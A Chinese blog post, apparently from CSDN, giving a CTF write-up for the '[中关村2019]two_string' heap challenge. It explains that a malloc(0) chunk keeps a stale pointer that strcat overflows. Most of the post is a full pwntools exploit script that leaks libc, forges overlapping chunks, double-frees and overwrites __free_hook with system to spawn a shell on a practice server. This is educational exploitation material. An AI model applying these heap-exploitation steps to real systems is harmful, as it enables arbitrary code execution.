[中关村2019]two_string

最新推荐文章于 2024-07-25 10:00:08 发布
最新推荐文章于 2024-07-25 10:00:08 发布
阅读量327 收藏
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/107570194
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

[中关村2019]two_string

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,合并的时候,使用的是strcat,但是total_size的计算,没有考虑如果原size为0的情况。

在add里面,我们可以申请size为0的堆。

根据堆的性质,malloc(0)和malloc(0x10)申请的是同一个大小的chunk,假设在fastbin里有多个chunk,malloc(0)取得的chunk其fd有一个指针,没有被清空,这样strcat就可以把这个指针追加进去,从而后面的堆的内容strcat后,就溢出了。那么就可以构造overlap chunk,然后进行常规的堆利用了。

#coding:utf8
from pwn import *

#sh = process('./two_string',env={'LD_PRELOAD':'./libc-2.27.so'})
#sh = process('./two_string')
sh = remote('node3.buuoj.cn',29489)
libc = ELF('./libc-2.27.so')
malloc_hook_s = libc.symbols['__malloc_hook']
free_hook_s = libc.symbols['__free_hook']

def add(size,content):
   sh.sendlineafter('>>>','1')
   sh.sendlineafter('string :',str(size))
   sh.sendafter('string :',content)

def show(index):
   sh.sendlineafter('>>>','2')
   sh.sendlineafter('index :',str(index))

def delete(index):
   sh.sendlineafter('>>>','3')
   sh.sendlineafter('index :',str(index))

def merge_strs(seq):
   sh.sendlineafter('>>>','5')
   sh.sendlineafter('merged :',seq)

add(0x10,'a'*0x10) #0
add(0xF0,'b'*0xF0) #1
add(0x20,'c'*0x20) #2
delete(0)
add(0x400,'b\n') #0
add(0xF0,'c'*0xF0) #3
add(0x3F8,'d'*0x3E2 + p64(0x410 + 0x70 + 0xC0) + p64(0x100) + '\n') #4

for i in range(5,12):
   add(0xF0,'e\n')

for i in range(5,12):
   delete(i)
#chunk1放入unsorted bin
delete(1)
add(0,'') #1
show(1)
sh.recvuntil('Notes are : ')
heap_addr = u64(sh.recv(6).ljust(8,'\x00'))
print 'heap_addr=',hex(heap_addr)
for i in range(5,8):
   add(0x10,'\n')
add(0,'') #8
show(8)
sh.recvuntil('Notes are : ')
main_arena_xx = u64(sh.recv(6).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base + free_hook_s
system_addr = libc_base + libc.sym['system']
print 'libc_base=',hex(libc_base)
print 'free_hook_addr=',hex(free_hook_addr)
print 'system_addr=',hex(system_addr)
delete(0)
merge_strs('1 1 1 1 1 1 4') #0使得chunk3的size低1字节为0
#清空prev_size
for i in range(7,-1,-1):
   delete(4)
   add(0x3F8,'d'*0x3E2 + 'd'*i + '\n') #4
   delete(0)
   merge_strs('1 1 1 1 1 4') #0
#布置prev_size
delete(4)
add(0x3F8,'d'*0x3E2 + p64(0x540) + '\n') #4
delete(0)
merge_strs('1 1 1 1 1 4') #0
delete(3) #形成overlap chunk
add(0xD0,'/bin/sh\n') #3
add(0x60,'b'*0x20 + '\n') #9

#double free
delete(2)
delete(9)
add(0x60,p64(free_hook_addr) + '\n') #2
add(0x60,'a\n')
add(0x60,p64(system_addr) + '\n')
#getshell
delete(3)


sh.interactive()

 

ha1vk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[面试题] Add Two String 求两个string型数字的和
BUILD
02-14 1190
题目: 输入string a, string b,求a和b的和,并且将和也用string型式返回。 分析: 来自F的面试题,编程基本功练习。模拟加法,和leetcode上的这道题比较像。 知道如何把对string型的'9'和int型的9进行相互转换即可。 我的代码: #ifndef Add_String_Solution_h #define Add_String_Solution_h #
BUUCTF-PWN刷题记录-13(静态编译+去除调试符号)
weixin_44145820的博客
04-27 1337
目录[中关村2019]one_string(unlink) [中关村2019]one_string(unlink) 看这个保护,我以为很简单,然而··· 这题去除了所有符号,并且是静态编译,所以第一步就是把主要函数找出来,如下 在edit函数中,程序会重新计算content的长度,这个时候如果利用了chunk复用,下一个chunk的size也会被计算进长度,这样下次编辑的时候就能覆盖si...
[BUUCTF-pwn] [中关村2019]two_string
weixin_52640415的博客
11-15 99
今晚无事 这题多一个菜单,除了add,show,free外多merge 概况: add写入size-1 +\0 看似没问题 没有off_by_null free也删了指针 没有double free merge串合并时size1+size2+... 应该都大于实际串长度也没问题 问题在哪呢?可不可以有一个块的串长度大于size? 在函数add里有这个特殊值值得关注:v2允许等于0! v2 = read_num(); if ( v2 < 0 || v2 > 4095 ).
add string
数残的coding之路
10-21 399
问题描述: Given two non-negative integers num1 and num2 represented as string, return the sum of num1 and num2.Note:The length of both num1 and num2 is < 5100. Both num1 and num2 contains only digits 0-9
buuoj Pwn writeup 186-190
yongbaoii的博客
06-11 398
186 hwb_2019_mergeheap 187 nsctf_online_2019_pwn1 188 roarctf_2019_easyheap 189 0ctf2015_freenote 190 [中关村2019]one_string
python中文语法提示_提示计算器语法
weixin_42356349的博客
01-29 219
输入框的输入方式错误。您应该将StringVariable绑定到它们,以便以后能够获取用户键入的内容:self.billvar = StringVar()bill_ent = Entry(self, textvariable = self.billvar)人数也一样。然后在total函数中,可以使用self.billvar.get()读取值。可以使用float(self.billvar.get()...
python 惰性序列_python 基础(三)
weixin_39528029的博客
12-13 284
函数调用定义一个函数:给了函数一个名称,指定了函数里包含的参数,和代码块结构。这个函数的基本结构完成以后,你可以通过另一个函数调用执行,也可以直接从 Python 命令提示符执行。如下实例调用了printme()函数:#!/usr/bin/python3# 定义函数defprintme(str):# 打印任何传入的字符串print(str)return# 调用函数printme("我要调用用户...
中关村_16素材网oss在线图床带画廊
03-18
【标题】"中关村_16素材网oss在线图床带画廊" 提供的是一个集成16素材网功能的图床服务,特别是结合了OSS(Object Storage Service)的在线图片存储和展示平台。OSS是云存储服务,通常用于大规模、高可用性的静态...
中关村科技租赁:2019年度报告.PDF
05-11
中关村科技租赁2019年度报告】展示了公司在科技和新经济领域的专业融资租赁服务。作为中关村发展集团旗下的唯一租赁平台,公司自2012年成立以来,专注于为科技和新经济公司提供高效、定制化的融资解决方案。在2018...
中关村高新入库申请材料
03-13
中关村高新入库申请材料】是针对企业希望加入中关村高新技术企业库所必需准备的一系列文档,这一过程对于企业来说至关重要,因为它能为企业带来诸多优惠政策、资金支持以及品牌提升。以下是相关知识点的详细介绍:...
中关村建筑.geojson
06-15
中关村建筑矢量文件。从OSM 原始数据导出的建筑边界数据。有一定的使用价值,数据覆盖范围大小为一平方公里左右。
TZMDS 20003-2019
03-26
TZMDS 20003-2019 是中关村医疗器械产业技术创新联盟团体标准,发布于 2019 年 11 月 18 日,实施于 2019 年 11 月 18 日。该标准旨在控制医疗器械网络安全风险,保护医疗器械安全运行。 Medical Device Security ...
中关村2019逆向 Reverse lebel:控制流平坦化 / python字节码分析
q1uTruth的博客
08-17 512
flat 看到题目,难道是控制流平坦化??? https://blog.csdn.net/yangbostar/article/details/6204724 看着这个switch的形式很像是while用switch实现 src_leak 得到了一个cpp源文件,这里体现了题目名字源文件泄露了 ...
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 474
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
极速下载!青苹果系统Win7旗舰版:稳定安全!
lihuiyun184291的博客
07-25 395
今天系统之家小编给大家带来了青苹果系统Win7旗舰版镜像,该版本系统离线制作而成,安全无病毒,还升级了防火墙功能,大家安装后时刻都能放心操作。同时,它是在保持原有的功能并适度优化,保留下来的功能轻松满足大家的使用需求,系统稳定性也很高,运作顺畅不卡顿。
企业如何保证公司内网安全
最新发布
shunyou0526的博客
07-25 309
部署防火墙和入侵检测系统:作为内网安全的第一道防线,防火墙和入侵检测系统能够有效阻止外部攻击和恶意软件的入侵。访问控制与身份验证:实施严格的访问控制策略,结合多因素认证(MFA),确保只有授权用户才能访问关键系统和数据。日志管理:建立全面的日志记录和审计机制,对所有数据访问、修改、删除等操作进行记录,以便于追踪和分析。电脑监控软件:使用电脑监控软件来监控员工的屏幕活动、上网行为等,防止内部威胁和不当使用公司资源。反病毒软件与反间谍软件:部署反病毒软件和反间谍软件等恶意软件防护工具,实时监测和清除恶意软件。
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1129
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
2024安全大模型技术与市场研究报告
cybtec的博客
07-25 425
2024安全大模型技术与市场研究报告
中关村软件园物业管理与服务策略
"中关村软件园物业管理服务方案" 中关村软件园物业管理服务方案是一份全面阐述如何有效管理园区物业的详细文档,旨在提供一个高效、专业且综合的服务框架,以满足园区内企业和员工的需求。该方案涵盖了从物业治理的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值